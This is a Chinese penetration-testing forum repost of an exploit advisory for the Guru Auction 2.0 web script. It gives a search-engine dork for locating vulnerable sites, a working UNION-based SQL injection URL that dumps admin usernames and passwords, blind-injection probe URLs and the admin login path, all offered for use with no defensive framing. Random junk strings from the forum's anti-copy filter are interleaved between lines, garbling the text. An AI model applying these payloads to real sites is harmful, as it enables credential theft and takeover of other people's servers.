中国网络渗透测试联盟
标题:
Guru Auction 2.0多重sql注射
[打印本页]
作者:
admin
时间:
2012-12-31 09:24
标题:
Guru Auction 2.0多重sql注射
Guru Auction 2.0 Multiple SQL Injection Vulnerabilities
- \- V! J% n) r$ V
, N8 z8 e9 v" }% C$ P+ S
作者 : v3n0m
% [ L5 k, |( J6 W5 J# f, E
应用 : Guru Auction 2.0
1 G& k( X7 t! b0 P. P: k
Price : $49
+ N9 S$ K8 X3 G: Z( x
Vendor :
http://www.guruscript.com/
r0 U* `6 H6 x7 j/ k5 x
Google Dork : inurl:subcat.php?cate_id=
# C/ P+ m5 ^- ~0 a W( l5 G1 y
2 O p- u. e _# j4 |
SQLi p0c:
; X |# R! H7 f& {6 J1 j# j
~~~~~~~~~~
$ w4 n4 t8 n6 y' s
http://domain.tld/
[path]/subcat.php?cate_id=-9999+union+all+select+null,group_concat(user_name,char(58),password),null+from+admin--
9 C& X2 b7 e3 J( X9 i1 H, e
' i- x% ^+ x' S0 P1 I2 `& l
, W' L8 Z; k4 [, ~. H
盲注 p0c:
C+ Q# T A6 c* X: Z0 U8 o
~~~~~~~~~~
* [0 d+ u3 A( D0 O, O/ {! j
http://www.political-security.com
/[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=5 << true
4 k- S' B; H2 r" G5 N5 R
http://domain.tld/
[path]/detail.php?item_id=575+AND+SUBSTRING(@@version,1,1)=4 << false
) m- f% m, t+ Z5 ^5 b& I
/ }0 Q! x0 r$ f e. t2 R! S3 A
管理登录入口:
% R9 p+ U3 A7 y+ A
~~~~~~~~~~
9 X8 k1 y9 A6 s3 E5 E- \9 _" f
http://domain.tld/
[path]/admin/
' a, ` U& Q) S1 ?5 A
欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/)
Powered by Discuz! X3.2